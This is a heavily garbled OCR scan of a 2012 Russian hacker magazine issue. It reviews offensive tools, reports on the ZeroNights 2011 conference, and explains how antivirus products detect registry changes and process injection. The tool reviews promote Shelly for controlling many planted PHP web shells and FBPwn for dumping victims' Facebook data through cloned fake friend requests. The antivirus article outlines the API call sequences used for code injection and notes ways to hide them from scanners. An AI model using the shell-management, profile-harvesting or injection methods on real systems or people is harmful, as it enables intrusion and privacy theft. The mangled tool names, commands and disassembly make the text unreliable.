также, как обыкновенный поисковый паук, 
только с небольшим хакерским уклоном: она 
инжектирует в формы различные спецсим- 
волы с определенными значениями, а затем 
анализирует ответы веб-сервера. Основные 
особенности и функционал утилиты: 

• малое количество ложныхсрабатываний; 

• поддержка СоІсІРизіоп; 

• возможность передачи скриптам дополни- 
тельной инфы: кукисы, юзер-агент и т.д.; 

• рекурсивный сканер файлов и директорий. 

В простейшем случаесканерзапускаетсятак: 



. /ііііііИ . рі мл/м. 'Еаг^е'Е . сот 

При этом есть ряд полезных пара метров: 

• 6 — директория или файл для начала скана; 

• и — данныедля ЬазісаиіЬепІісаІіоп; 

• р — прокси; 

• Т — интервал междузапросами; 

• \ — записьрасширенноголога вфайл; 

• г — рекурсивный краулинг; 

• А — вывод на экран всех НТТР-кодов. 
Остальные параметры, а также подробный хелп 
на английском языке ты найдешь на официаль- 
ном сайте сканера. 



5НЕІ_І_РѴ: УДОБНОЕ УПРАВЛЕНИЕ 

Если ты хочешь удобно работать с множе- 
ством шеллов, то вряд ли найдешь средство 
лучше БЬеІКу. Основная идея этой системы, 
написанной на РегІ, заключается в центра- 
лизации всего и вся. БЬеІІІу состоит из двух 
частей: клиента и сервера. Клиентская часть 
представляет из себя обычный РНР-шелл, 
который необходимо сохранить на удаленном 
сервере (точнее, много шеллов, которые нужно 
сохранить на разных серверах), а серверная 
часть — это, собственно, сам РегГовый скрипт 
управления шеллами. В основном окне про- 
граммы содержится шесть вкладок, названия 
которых говорят сами за себя: 

• «Шеллы» (ЗЬеІІз); 

• «Домены» (Оотаіпз); 

• «Статистика» (Біаіз); 

• «Обновление» (ІІрсЫе); 

• «Настройки» (БеШпдз); 

• «Прокси» (Ргоху). 

Также имеется дополнительный раздел под 
названием «Терминал», который отвечает 
за общение с шеллами на удалённых серверах. 
Начать работу со скриптом очень просто: залей 
все содержимое архива в директорию сді-Ьіп 
и запусти скрипт зеіир.рі. Он проведет все 
необходимые манипуляции автоматически. 
Подробнейший мануал по работе с БЬеП^у и ее 
настройке можно найти в папке с программой. 



СТАТИЧЕСКИЙ АНАЛИЗ КОДА 
ВМЕСТЕ С А6КІІТІ0 

ИБ-сообществу известно великое множество 
программ для статического анализа исход- 
ников на критические ошибки. Тулза АдпШо 
выгодно выделяется среди них открытостью 
сорцов и универсальностью. Шутка ли, анали- 
затор поддерживает большинство популярных 
языков программирования: А5Р, АБР.пеІ, С#, 
^ѵа, ^ѵаБсгірІ, РегІ, РЬр, РуіИоп, РиЬу, ѴВ.пеІ, 
а также ХМІ_. 

Перечислю лишь некоторые особенности 
и функциональные возможности этой замеча- 
тельной программы: 

• возможность командной работы; 

• удобнейшие профили для ручного анализа 
кода; 

• удобный профильисследуемогоприложе- 
ния для анализа его исходников; 

• подробныеотчеты, отсортированные 

по имени исследователя, имени приложения 
и многим другим параметрам; 

• списокдел для будущегоанализа кода; 

• автоматический статический анализ кода; 

• встроенный список наводящих вопросов, 
предназначенных для помощи в анализе 
кода (так называемый чек-лист). 

Огромным плюсом проекта также являются 
его частые обновления. Как видишь, АдпШо 
вполне может пригодиться любому профес- 
сиональному пентестеру (или целой команде 
профессионалов) в его каждодневной работе. 
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ПЕНТЕСТ НИР- ИНТЕРФЕЙ СО В 



ѴѴеЫщесІ — это бесплатная утилита, 
предназначенная для автоматиче- 
ского тестирования веб-приложений 
и веб-сервисов. Она подходит 
как для тестирования отдельных 
системных компонентов с НТТР- 
интерфейсом (Э5Р, А5Р, С6І, РНР, 
АЭАХ, Эегѵіеіз, НТМЬ Рогтз, ХМЬ/ 
50АР ѴѴеЬ Эегѵісез, РЕ5Т и т. д.), 
так и для создания целого набора 
тестов, с помощью которых можно 
собирать статистику и мониторить 
работу системы почти в реальном 
времени (к примеру, отслеживать 
время отклика веб-приложений). 

Так как в качестве АРІ для создания 



тестов выступает язык ХМІ_, то с на- 
стройкой сможет справиться любой 
программист. В ХМЬформате гене- 
рируются также и отчеты по пенте- 
стам, а значит, их можно успешно 
использовать в любой совместимой 
внешней программе. 

Несомненным плюсом проги 
является тот факт, что она написана 
на РегІ и может работать практи- 
чески на любой платформе. Однако 
на сегодняшний день экзешник 
ѴѴеЫщесІ доступен пока только 
для ѴѴіпсіоѵѵз. Для запуска утилиты 
в другой ОС тебе понадобится рабо- 
чий интерпретатор РегІ. 




Автор: 

Егік Ніеітѵік 

цт.: 

Ьі1;.Іу/ед Н2рг 
Система: 

ѴѴіпсІоѵѵз 





Автор: 

Есіде-Бесигііу 

цки 

ЬіЫу/0А9ѵІ 

Система: 

*ПІх/\Л/ІП 





Автор: 

АНтесІ Баа^ап 

цки 

сосіе.доодіе. сот/р/ 
{Ьрѵѵп 

Система: 

*піх/ѵѵіп 




АНАЛИЗАТОР ПАКЕТОВ 
N ЕТѴѴОРКМ ІИ ЕР 

Замечательная утилита ІЧеІѵѵогкМіпег явля- 
ется одним из лучших на сегодняшний день 
инструментов для анализа перехваченных 
данных, которые сохранены в формате РСАР. 
Утилита пассивно анализирует дамп с трафи- 
ком, безошибочно определяетучастников об- 
мена сетевыми данными и распознает опера- 
ционные системы, установленные на каждом 
хосте, по размеру окна, времени жизни пакета 
и уникальному набору флагов. ІЧеІѵѵогкМіпег 
также выдает структурированную информацию 
об открытых сессиях, активных портах и про- 
чей инфраструктуре сети, снимает баннеры 
различных демонов. 

Одной из самых важных фич программы 
является возможность извлекать файлы и сер- 
тификаты, передаваемые по сети. Эта функция 
может быть использована для перехвата и со- 
хранения всевозможных аудио- и видеофай- 
лов. Поддерживаются протоколы РТР, НТТР 
и 5МВ. Для них доступно также извлечение 
пользовательских данных (логинов и паролей). 
Программу можно использовать и для сниф- 
финга и парсинга трафика \Л/І_АЫ (ІЕЕЕ 802.11). 

К слову, «всего» за 500 евро разработчик 
предлагает и платную версию своего творе- 
ния, с ногдо головы увешанную всяческими 
дополнительными плюшками. Но в большин- 
стве случаев нам вполне хватит и бесплатной 
версии ІЧеІѵѵогкМіпег. 



СОБИРАЕМ СУБДОМЕНЫ 
И АДРЕСА Е-МАІІ_ 

Если тебя заинтересовал какой-либо сайт, 
то первым делом ты наверняка попытаешься 
раздобыть максимум информации о нем. К этой 
информации относятся связанные е-таіі- 
адреса, имена субдоменов и т.д. Конечно, 
различные хакерские комбайны вроде Асипеііх 
ѴѴѴ5 включают в себя соответствующие моду- 
ли, но применять их для этой цели — все равно 
что стрелять из пушки по воробьям. В общем, 
советую тебе использовать замечательную 
утилиту іЬеНагѵезІег, продемонстрированную 
на последней конференции ВІаскНаЕ Этот 
питоновский скрипт собирает всю вышепе- 
речисленную информацию из всех доступных 
публичных источников, например поисковиков 
и серверов с ключами РСР. Функциональные 
возможности и особенности утилиты: 

• генерация отчетов вХМЬ и НТМЕ; 

• верификация найденных виртуальных 
хостов и субдоменов; 

• 0145 геѵегзе Іоокир; 

• поиск информации о пользователях и хостах 
в Воодіе, Віпд, Ыпкесііп и Ехаіеаб. 

Пример команды для поиска всехе-таіГов, 
связанныхс доменом тісгозоЙ.сот в первых 
пятистах результатах из выдачи Гугла: 

. /ІіІіеІіагѵеБІіег . ру -сі тісгозо-РЕ.сот \ 

-1 500 -Ь §оо§1е 



ПОИМЕЙ РАСЕВООК! 



Многие люди выкладывают в социальных сетях 
подробнейшую информацию о себе. И соверша- 
ют огромнейшую ошибку! Практически любой 
человек при должном старании можетузнать 
о таких ребятах почти все! В качестве примера 
одного из средств для раскрытия персональ- 
ных данных приведу тулзу ЕВРѵѵп — открытое 
кросс-платформенное ^ѵа-приложение, пред- 
назначенное для дампа профилей пользовате- 
лей ЕасеЬоок. Прога отсылает списку заданных 
пользователей запросы на добавление в друзья 
и ждетуведомлений о подтверждении. Как 
только жертва одобряет запрос, приложение 
сохраняет все фотографии, список друзей 
и прочую информацию из профиля жертвы. 

Типичный сценарий работы ЕВРѵѵп выглядит 
следующим образом: 

1. Состраницыжертвы собирается вся доступ- 
ная информация. 

2. Затем запускается Ітіепсііпд-плагин, добав- 
ляющий вдрузья всех друзей жертвы. 

3. Далее вдело вступает сіоппіпд-плагин, 
клонирующий имя ифотоодногоиздрузей 
жертвы. 

4. Отсылаетсяупомянутый вышезапрос на до- 
бавление в список друзей. 

5. Послеподтверждениязапроса парсятся все 
доступные страницы. 

Через несколько минутжертва, возможно, уда- 
лит твой фейковый аккаунт из друзей, но будет 
уже поздно :). 
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СЦЕНА 



2его№дМ$ 

2011 



ЗАПОЗДАЛЫЙ ОТЧЕТ 
С ХАКЕРСКОЙ КОНФЕРЕНЦИИ 
В САНКТ-ПЕТЕРБУРГЕ 

Двадцать восемь технических докладов, десять часов хакерской ат- 
мосферы и поп-віор общения, 11 технических конкурсов, приз $10 000 
от Яндекса за найденные уязвимости, Осіау-шоу с демонстрацией еще 
нигде не опубликованных сплоитов — это лишь малая часть того, что 
происходило в ноябре на хакерской конференции 2егоІ\ІідЫ:5 2011 . 



ПЕРВАЯ КОНФЕРЕНЦИЯ 



Черт, кто придумал проводить конференцию 
в конце ноября в Питере? :) Это худшее время 
для поездки в северную столицу. Но когда 
речь идет о новой хакерской конференции, 
проводящейся впервые, то тут уже не до раз- 
думий. В общем, в Питер мы выдвинулись 
доброй половиной редакции. На площадке мы 
первым делом увидели сотни молодых людей 
с ноутбуками, расхватывающих свои бейджики 
и внимательно изучающих программу двух тре- 
ков, на которых вот-вот должны были начаться 
доклады. Вот и куча знакомых лиц — наших 
авторов и просто друзей, которые работают 
в самых разных компаниях и занимаются ин- 
формационной безопасностью. Тут сразу стало 
ясно, что это тебе не очередная скучная конфа, 
которые сотнями проходят каждый год, — это 
настоящая хакерская тусовка. Можно сказать, 
клуб друзей, в котором тебя ждут доклады, 
конкурсы и куча общения. 




Дима Частухин рассказывал про взлом интернет-киосков и 
платежных терминалов 



ДОКЛАДЫ 



Никакие слайды, никакое видео и даже отчеты 
участников не смогут передадать ту атмосфе- 
ру, которая царит во время выступлений на ха- 
керских конфах. Тут надо быть! Где еще тебе 
покажут реальные уязвимости в банковских 
системах, повеселят Ііѵе-видео со взломом 
различных платежных терминалов и киосков, 
докажут, что данные для промышленных 
контроллеров в ЭСАйА-системах можно очень 
просто проспуфить, расскажут изнутри, что 
сейчас происходит в мире киберпреступников 
в Азии? Иной раз думаешь: «Откуда же взялся 
этот монстр, который вот это все расковырял 
и сейчас рассказывает?», а потом подходишь 
к нему и понимаешь — человек, не киборг, 
просто очень умный :]. На конференции мы 
несколько раз ловили себя на мысли, что 
одного дня для такого ивента мало. Программа 
настолько плотная и насыщенная, что иногда 
не знаешь, на какой из параллельных треков 
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Федор Ярочкин рассказывает про киберпреступность в Китае 

идти: и там и там интересные доклады. Очень 
порадовал формат РазГГгаск: каждому доклад- 
чику выделяется всего 15-20 минут для вы- 
ступления. В результате за час ты успеваешь 
прослушать самые разные доклады от разных 
людей, а потом поймать их и узнать подробно- 
сти. Суперплотно, суперинформативно! 



КОНКУРСЫ И ІДЕМКИ 



Важная часть любой конфы — это конкурсы. 
Конкурс І_оскріскіпд ѴіІІаде по взлому замков 
традиционно привлек особое внимание: 
десятки людей толпились вокруг стенда 
в течение всего дня. Обнаружить уязвимость 
в промышленном контроллере, решить 
сгаскте от антивирусного вендора, найти 
и проэксплуатировать баг в 5АР — конкурсы 
были на любой вкус и цвет. Самые крутые 
джедаи могли попробовать свои силы в тур- 
нире «Царь горы», где предлагалось любыми 
способами получить доступ куязвимому 
серверу и удерживать его как можно доль- 
ше, отражая атаки других участников. Этот 
турнир выиграла команда [РВОТ]. Порадовал 



Денис Баранов, который выиграл конкурс 
за лучшую майку, на которой был скриншот 
с Х55, найденной на сайте 2егоІ\ІідЫ5 :). Все 
ждали вечера, когда Антон «Іоха» Карпов (ты 
наверняка его помнишь по многочисленным 



публикациям в «Хакере») подвел итоги поиска 
уязвимостей в Яндексе, проводившегося в те- 
чение месяца. Победителем стал Владимир 
Воронцов из ОЫзес, получивший в качестве 
приза чек на $5 000. Отличным завершением 
программы стало Обау-шоу, во время которого 
докладчики демонстрировали сплоиты, еще 
не появившиеся в паблике. Где еще ты такое 



2011 год, безусловно, удался на хакерские 
конференции. Если раньше была одна лишь 
небольшая секция по безопасности на СЬаоз 
Сопзішсііоп (тоже в Питере), то в этом 
году у нас появилось сразу две настоящие 
хакерские конференции: РЕЮ и 2егоІ\ІідЫ5. 
Сдокладами мирового уровня, иностранными 
спикерами и, что, возможно, важнее всего, 
невероятной хакерской атмосферой, в которую 
ты сможешь окунуться уже в этом году. Про- 
пустить эти конференции будет самой большой 
ошибкой. Спасибо парням, которые устроили 
дня нас этот праздник: Саше Полякову, Алек- 
сею Синцову, Диме Евдокимову, Леше Тюрину, 
Илье Медведовскому и всем причастным, 
которых мы просто не знаем :). ІНІ 



Найди хоть одного зевающего хакера — все внимательно слушают! :) 





ПЯТЬ ЛУЧШИХ ДОКЛАДОВ ПО ВЕРСИИ ][ 



«Анализ незаконной 
интернет-деятельности» 
Невероятно харизматич- 
ный Федор Ярочкин специ- 
ально прилетел с Тайваня, 
чтобы поделитьсясвоим 
опытом в области анализа 
инцидентов компьютерной 
безопасности. В результате 
мыузнали много нового 
о целевыхатаках(АРТ) 
и разныхинцидентах,атак- 
жео кибер преступности 
в Китае. 



«Где лежат деньги?» 

Леша Синцов расказал 
о множестве Обау- 
уязвимостей в реальных 
системахонлайн- 
бан кин га, об общих ошиб- 
ках всех разработчиков 
отечественных популяр- 
ныхпродуктов,отом, 
как за пять минут обойти 
токены, а также о своем 
опыте в проведении теста 
на проникновение в реаль- 
ные банковские системы. 



«Уязвимости расщепления 
НТТР-ответа, внедрения 
заголовков и заражения 
кеша: снова в строю» 
Доклад посвящен 
новым исследованиям 
уязвимостей расщепления 
ЕІТТР-ответа, внедрения 
заголовков и заражения 
кеша. Владимир Воронцов 
рассказал о них на примере 
современных браузеров 
и веб-приложений и по- 
казалдемки. 



«Практические атаки 
на интернет-киоски и пла- 
тёжные терминалы» 
Алексей Поляков и Дима 
Частухин часто колесят 
по миру, посещая разные 
конференции. Встретив 
очереднойтерминал или 
киоск, они пробуютобойти 
ограничения, налагаемые 
на пользователя. Этотжи- 
вой докладбыл полон ви- 
деодемок из самых разных 
уголков нашей планеты :). 



«Опасности 36 и НЕ: 
от радио кядрусети и про- 
токолам» 

Филипп Ланглуа показал 
новыетехнологии поза- 
щите и атаке сетей 36 и НЕ. 
Он продемонстрировал 
на примерах, как внешний 
атакующий можетвоз- 
действовать на телеком- 
муникационные ком па ни и, 
операторов мобильной 
связи и557-провайдеров. 
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Евгений Дроботун (201074йтаіІ.ги) 



БУРИМ 

АНТИВИРУС. 




Про функции 
уведомления 
и функции обратного 
вызова (саІІЬаск- 
фуНКЦИИ) ѴѴІПСІ0ѴѴ5 
можно почитать 
здесь: ѵѵѵѵѵѵ.зѵѵѵѵ-К. 
ги/2010-02-21/362. 




Наша любимая схема 



Еще глубже! 



На диске можно 
найти утилиту ВІаск- 
ІідІіІотР-Бесиге, 
описанную во врезке 
«Брутфорс РШ». 



РАССМАТРИВАЕМ 
СПОСОБЫ 
МОНИТОРИНГА 
СОБЫТИЙ 
И ПРОАКТИВНОЙ 
ЗАЩИТЫ В РАЗНЫХ 
АНТИВИРУСНЫХ 
ПРОГРАММАХ 



Сегодня мы продолжим изучение способов 
противодействия антивирусам и посмотрим, 
чем еще, кроме компонентов для сигнатурного 
сканирования и анализа файлов, вооружают 
свои творения создатели антивирусных 
программ. 
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Бурим антивирус. Еще глубже! 




Рисунок 1. Простейший пример нейросети, анализирующей поведение системы 



Рисунок 2. События, контролируемые проактивной защитой «Антивируса Касперского») 



□ от мы и добрались до таких понятий, 
как НІР5 (Но5І Іпігизіоп Ргеѵепііоп 
Бузіет), «проактивное детектиро- 
вание», «поведенческий анализ», «анализ, 
основанный на мониторинге системных со- 
бытий»... Эти понятия на самом деле вносят 
даже меньше ясности, чем какой-нибудь 
«эвристический анализ». Они могут подраз- 
умевать очень широкий спектр технологий и, 
в общем-то, никак не помогают понять, какая 
из них используется в конкретном продук- 
те. Под этими понятиями может скрываться, 
например, примитивная защита нескольких 
ключей реестра, или уведомления о попытках 
доступа к определенным директориям, или 
анализ поведения программ, или какая-либо 
другая технология, основанная на мониторинге 
системных событий. Если мы снова обратимся 
к нашей любимой двухкомпонентной схеме, 
то увидим, что технический компонент — это 



мониторинг системных событий или анализ 
поведения системы, а аналитический может 
быть каким угодно, от пресечения единичных 
подозрительных событий до сложного анализа 
цепочек программных действий (то есть та же 
эвристика с набором правил и весовыми коэф- 
фициентами опасности или, может быть, даже 
что-то на основе нейросетей (смотри рисунок 1 
и соответствующую врезку)). 

В первую очередь нас будет интересовать 
технический компонент проактивной защиты, 
поскольку принципы анализа событий схожи 
с принципами анализа, описанными в прошлой 
статье, а отличия, если они есть, мы рассмо- 
трим позже. Итак, приступим. 



ЧТО БУДЕМ МОНИТОРИТЬ? 



Для различных вредоносных программ ха- 
рактерно довольно много событий, причем их 
список неуклонно увеличивается по мере раз- 



вития творческих способностей вирусописате- 
лей. Общую картину можно увидеть, к примеру, 
на рисунке 2. Здесь показаны события (вернее, 
даже совокупности событий), на которые 
реагирует «Антивирус Касперского». Конечно, 
некоторые пункты (а именно «Активность, 
характерная для Р2Р-червей», «Активность, 
характерная для троянских программ» и «Ак- 
тивность, характерная для червей») описаны 
очень уж обобщенно, и сейчас мы попытаемся 
всё это дело немного конкретизировать. Итак, 
в первую оч ередь речь идет о сетевой актив- 
ности: подавляющее большинство нечисти 
обязательно пытается или что-то передать 
в сеть (пароли, явки, номера кредиток и т. д.) 
или, наоборот, что-то получить из сети (загру- 
зить основную часть малвари или обновления, 
принять какие-нибудь команды управления, 
да мало ли еще что). Многие вредоносные 
программы пытаются проинжектить свой код 




БРУТФОРС РЮ 



Некоторые утилиты (например, ВІаск- 
ІідЫ от Р-Бесиге или 5руОІ_І_Ретоѵег) 
используют для поиска скрытых процессов 
брутфорс идентификаторов процессов (ВРШ). 
Метод достаточно прост и в то же время 
эффективен. Такие утилиты открывают 
процессы и перебирают все возможные РШ. 

К примеру, ВІаскІідМ в цикле пытается вызвать 
ОрепРгосез5 для всех возможных значений 
идентификатора процесса из диапазона 
от 0x0 до 0х4Е1С. Таким образом, можно 
получить список процессов, присутствующих 
в системе. Затем вызывается функция Сгеа- 
*еТооІИеІр325пар5Ио* , которая выдает второй 
список процессов. Потом два эти списка 
сравниваются: если процесс присутствует 
в первом и отсутствует во втором, то он 
считается скрытым. 



ХАКЕР 02/157/2012 



075 






МАШАКЕ 



.І*х1:івиіі11 I нс ЫВДіІ: 
.1(ХС:№2«Щ1 

.ихсш^ііі 

.Ирх(;«=0*й9&іл 

.(*ЯІ 

я ((ЯІ;Ц[ВД?»17 
.ІѴл( СВИРИН 



- .Г»Іг№?ШІ 

* .№(гЯРк4*К21 

- .Е*хЕ ;>В»7В73 

* Я №*:Ш№?*В7* 

- .Е**Е ІІІП*2ТВЙЙ 
‘ .(ГХСЖ29В2С 
4 .ІНк:№2№Е 



' риіг 


1 


; №упсычіиік 


рліі 


нл 


“ ГѵЁуч-пЕ 


рЦ5>1 


Ч 


; №#іэ(ігргіі(*г 


рцріі 


гЬр 




рпк 


гіияггі: р(г [ГіІ] 


1 Нц 


СІІІ 


,|^Лг І ГуСІиНдгН 94 



У? 

пли 

слр 

}* 



ГЙІ Н ГІір 

ШГЕ Іі)С 4ННМ 
*цх я Ичіаг7 | _ЫйСй.й 
№і, гВр 

ЮвгГ ІВС 4НІЧС 



ми ГС». [*йи] 



НН 


СЛІІ 


деіНгдОрс-пйгдіЁіЯ 




.сиіі занятая 


ЕкС 


Шр 




ЛшжЫШШЪЖт 




+4І 




.МкаІНЖН 


рор 


шші 








ьппге. 




,Ігн*:ІНЖ« 








Л*лІіШ&В74Е ІМ_%217«: 




; 


соре шг: 


Лшезшэягпе 


Ж1* 


«■і тІ-іВД 




.Енс:*№Я7і ь 


Г ріЫЬ 


1 1 




лгиі:яа«н ла 


ріКП 


ГЫ і 


ВГіНІЕ 


+СП(%3«*т717 


рчі-ІІѢ 


м і 




.»Л1:ЙНЗД71# 


ріі^П 


1 і 


ЬЬЫксГѵМІі-» 


:ІМ7ВЛВ 


аіКГЪ 


#с.!т ; 




.ем«:ІН2*7іС 


«11 


4$ :Й!Г >; Но 1. 1 ІГЦСЛ цу> 1 и . 


ЛшхЬ-ЛѢкЫІІІ 


ЕрхЕ 


РЯХ. ІИ 





Рисунок 4. Контроль за изменениями в реестре с помощью РедМоШуСЬапдеКеуѴаІие. Выше красной пунктирной линии 
показана реализация в МсАГее, ниже линии — в «Касперском». Как говорится, найди отличия 



устанавливает в сигнальное состояние за- 
ранее созданный объект типа Еѵепі (событие), 
и антивирусу остается только отследить это 
событие и принять соответствующие меры. 
Помимо РедІМоШуСЬапдеКеуѴаІие, в не- 
драх ѴѴіпбоѵѵз прячется еще одна небольшая 
функция СтРедізІегСаІІВаскЕх, с помощью 
которой также можно контролировать реестр. 
Эта функция устанавливает так называемую 
саІІЬаск-функцию (функцию уведомления), ко- 
торая вызывается при изменениях в заранее 
определенных ветках реестра. Эта функ- 
ция, в отличие от РедМоШуСЬапдеКеуѴаІие, 
может использоваться только в режиме ядра, 
и поэтому такой контроль за реестром осу- 
ществляется с помощью драйвера (к примеру, 
драйвер «Антивируса Касперского 2010» кІіЕ 
вуз импортирует функцию именно для этой 
цели (рисунок 5)). Как правило, антивирусы 
редко довольствуются только одним спо- 
собом контроля реестра (особенно первым, 
который не так уж и надежен, тем более если 
перехват нужных функций делать в юзермо- 
де) и используют комбинацию двух (МсА^ее, 
например, помимо перехвата использует 
РедІ\ІоШуСЬапдеКеуѴаІііе), а то и всех трех 
способов. 



в доверенный процесс (обычно это ехріогег. 
ехе или зѵсЬозЕехе), получить привилегии 
отладчика и изменить системные компоненты 
(например, пропатчить ядро ОС в своих интере- 
сах) — в общем, как можно глубже внедриться 
в систему. 

Думаю, с отслеживаемыми событиями все 
ясно, поэтому пойдем дальше. 



СЛЕДИМ ЗА РЕЕСТРОМ 



Любая уважающая себя малварь при зараже- 
нии системы должна позаботиться о своем 
повторном запуске после перезагрузки. Она 
может выбрать для этого множество доступных 
мест, начиная от папки «Автозагрузка» и за- 
канчивая кучей ключей автозапуска в реестре. 
Чаще всего, конечно же, малварь модифициру- 
ет ключи автозагрузки в реестре. 

Некоторые вредоносные программы также 
пытаются изменить или дополнить какие-либо 
другие ключи реестра (к примеру, пропи- 
сать свою ОН, изменить параметры Іпіегпеі 
Ехріогег'а или установленной в системе анти- 
вирусной программы и т. д.). В общем, делаем 
вывод: за реестром надо следить, и следить 
тщательно. И все, даже самые захудалые анти- 
вирусные программы, гордо несущие в своем 
составе компонент проактивной защиты, про- 
сто обязаны это делать. 

Самые распространенные способы кон- 
троля изменений в реестре — это перехват 
АРІ-функций работы с реестром или ис- 
пользование специализированных функций 
контроля над реестром. Что касается первого 
способа, то для контроля над реестром обычно 
достаточно перехватить функции РедОрепКеу, 
РедСгеаІеКеу, РедйеІеІеКеу из асІѵарі32. 
сІІІ или более низкоуровневые МОрепКеу, 



ШСгеаІеКеу, ІЧЮеІеІеКеу и т. п. На рисунке 3 
показано, как антивирус от МсА^ее перехваты- 
вает функции ядра для работы с реестром. 

Следующий способ заключается в ис- 
пользовании специальной АРІ-функции 
РедІ\ІоШуСЬапдеКеуѴаІие. Создатели ѴѴіпсІоѵѵз 
обучили эту функцию извещать программу, 
которая ее вызвала, об изменении опреде- 
ленного ключа реестра. Ее используют 
многие антивирусные программы (рисунок 
4). В случае изменения реестра функция 



ИНЖЕКТ В ЧУЖИЕ ПРОЦЕССЫ 



Инжект в память чужого процесса можно 
считать классическим методом, который 
используют современные вирусы, так как он 
позволяет реализовывать вредоносные функ- 
ции под доверенным процессом. Очень часто 
в роли этого доверенного процесса выступает 
ехріогег.ехе, чуть реже — вѵсЬозЕехе. 

Прежде чем внедряться в нужный про- 
цесс, его необходимо найти. Если речь идет 
об ехріогег.ехе, то самый простой и удобный 
способ для малвари — это задействовать 
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Рисунок 5. Функция СтРедІБІегСаІІВаскЕх в драйвере кІіГ.зуз из «Антивируса 
Касперского 2010» 
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Бурим антивирус. Еще глубже! 




Рисунок 6. Перехват ЫШБегРіпсІѴѴіпсІоѵѵЕх «Антивирусом Касперского» 




Рисунок 7. Контроль над операциями с памятью и созданием потоков в антивирусе РгѴѴеЬ 



РіпсІѴѴіпсІоѵѵ (или РіпсМіпсІоѵѵЕх) с идентифи- 
катором окна ргодтап. РіпсІѴѴіпсІоѵѵ, в свою 
очередь, базируется на ІМШзегРіпсІѴѴіпсІоѵѵЕх, 
и, перехватив ее (рисунок 6), можно отследить, 
какая программа ищет процесс ехріогег.ехе. 

Существует как минимум два очень рас- 
пространенных способа внедрения посторон- 
него кода в адресное пространство какого- 
либо процесса. Первый способ: получаем 
дескриптор процесса посредством вызова 
функции ОрепРгосезз, выделяем в нем нужный 
кусочек памяти с атрибутом РАСЕ_ЕХЕСІІТЕ_ 
РЕАйѴѴРІТЕ (АРІ-функция ѴИиаІАІІосЕх), 
копируем туда все, что нам нужно, добываем 
дескриптор основного потока, замораживаем 
его (БизрепсІТЬгеасІ), получаем и запоминаем 
регистровый контекст (ОеГГЬгеасІСопІехі), 
пишем в указатель команд адрес начала 
вредоносного кода, обновляем регистровый 
контекст (БеГГЬгеасІСопІехі) и размораживаем 
поток (РезитеТЬгеасІ), передавая управление 
на внедренный код, который после выполне- 
ния задуманного восстанавливает оригиналь- 
ный указатель команд. 

Второй способ: получаем дескриптор 
процесса посредством ОрепРгосезз, вы- 



деляем в нем память также, как и в первом 
случае(ѴИиаІАІІосЕх), копируем туда внедряе- 
мый код через ѴѴгіІеРгосеззМеітіогу и создаем 
удаленный поток с помощью АРІ -функции 
СгеаІеРетоІеТЬгеасІ. 



Конечно, увидев последовательно- 
сти вызовов ОрепРгосезз\ѴИііаІАІІосЕх\ 
ѴѴпІеРгосе55Метогу\5изрепбТЬгеасІ\ 
6еЕГЬгеасІСопІехі\ 5еЕП"ігеасІСопІехі\ 
РезштіеТЬгеасІ или ОрепРгосезз\ѴИііаІАІІосЕх\ 



НЕЙРОСЕТИ НА АНТИВИРУСНОЙ СЛУЖБЕ 



Искусственная нейронная сеть представляет собой математическую 
модель нейронной сети головного мозга человека (или какого-нибудь 
другого животного). Она состоит из простейших элементов — нейронов, 
которые связаны между собой (рисунок 1). Каждый нейрон выполняет 
несложную операцию: на основе поступающих от других нейронов 
сигналов, которые представлены в виде чисел от 0 до 1, и их весовых 
коэффициентов вычисляет выходной сигнал. Весовые коэффициенты, 
или веса связей между нейронами, представляют собой параметры, 
определяющие работу нейронной сети. Нейроны группируются 
в последовательность слоев, входные сигналы поступают на первый 
(входной) слой и последовательно проходят все слои до последнего 
(выходного). В нашем примере в качестве входных сигналов 
используются события, происходящие в системе (количество входов 



равно количеству анализируемых событий, при этом на каждый вход 
подается 1, если событие произошло, и 0, если события не было), каждый 
выход нейросети соответствует определенному типу вредоносной 
программы (значения на выходах могут меняться от 0 до 1, а в качестве 
решения выбирается тот выход, на котором в итоге зафиксировано самое 
большое значение). 

Обучение нейронной сети может проводиться с учителем (на основе 
уже решенных задач) или без него (на основе реакции среды). 

Обучение с учителем (которое больше подходит для нашего случая) 
происходит при последовательном решении с помощью нейронной сети 
уже выполненных задач и сравнении полученного результата с уже 
известным: если они не совпадают, производится коррекция весовых 
коэффициентов связей между нейронами. 
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ѴѴгіІеРгосе55Метогу\ СгеаІеРетоІеТЬгеасІ 
в файле, любой, даже самый захудалый файло- 
вый сканер, оснащенный хотя бы примитив- 
ным эвристическим анализатором, поднимет 
тревогу, ведь в нормальных программах такие 
последовательности вызовов АРІ встречаются 
крайне редко. Но ведь шифрование файла, 
неявный вызов функций, получение адресов 
нужных АРІ с помощью ЗеіРгосАсІсІгезз по хе- 
шам их названий и прочие хитрости по со- 
крытию и запутыванию кода никто не отменял, 
и поэтому с этим надо что-то делать. Кроме 
того, при очень большом желании можно обой- 
тись без ѴѴгіІеРгосеззМеітіогу. 

Поэтому проактивной защите прихо- 
дится тяжело трудиться и контролировать 
и функции по работе с виртуальной памятью, 
и функции по созданию потоков. Конечно же, 
перехватывать эти функции нужно в ядре 
с помощью драйвера. Все функции по работе 
с виртуальной памятью основаны на функциях 
№АІІосаІеѴИиаІМетогу, ШРгееѴИиаІМетогу 
и ШѴѴпІеѴИііаІМетогу, а АРІ 
СгеаІеРетоІеТЬгеасІ — на МіСгеаІеТЬгеасІ. И, 
например, йгѴѴеЬ перехватывает их все с помо- 
щью своего драйвера сіѵѵргоі.зуз (рисунок 7). 

Есть и другой способ отследить создание 
потоков — воспользоваться специальной 
функцией Рз5еіСгеаІеТЬгеасІІ\ІоШуРоиІіпе. Эта 
функция регистрирует функцию уведомления, 
которая вызывается в момент создания или 
уничтожения потока (рисунок 8). Поскольку 
функция уведомления вызывается в контексте 
потока, который инициировал создание нового 
потока, то определить инициатор и выяснить, 
насколько он его благонадежен, не составляет 
труда. 



ЗА КАЖДЫМ ПРОЦЕССОМ НУЖЕН 
ГЛАЗ ДА ГЛАЗ 



Я думаю, вряд ли кто-нибудь усомнится в необ- 
ходимости контроля всех процессов, которые 
крутятся в памяти компьютера, и уж тем более 
о целесообразности выявления процессов, 
пытающихся скрыться от «всевидящего 
ока» Тазк Мападег'а. Любой процесс может 
оказаться зловредным, а уж тот, который 
пытается скрыть свое присутствие в системе, 
и вовсе потенциальный враг. Поэтому все 
процессы необходимо строжайше учитывать 



и контролировать. Разработчики операцион- 
ной системы ѴѴіпсІоѵѵз предусмотрели много 
механизмов для получения уведомлений 
о наступлении каких-либо событий. О приме- 
нении некоторых из них в различных анти- 
вирусных программах я немного рассказал 
выше (такие механизмы основаны на ис- 
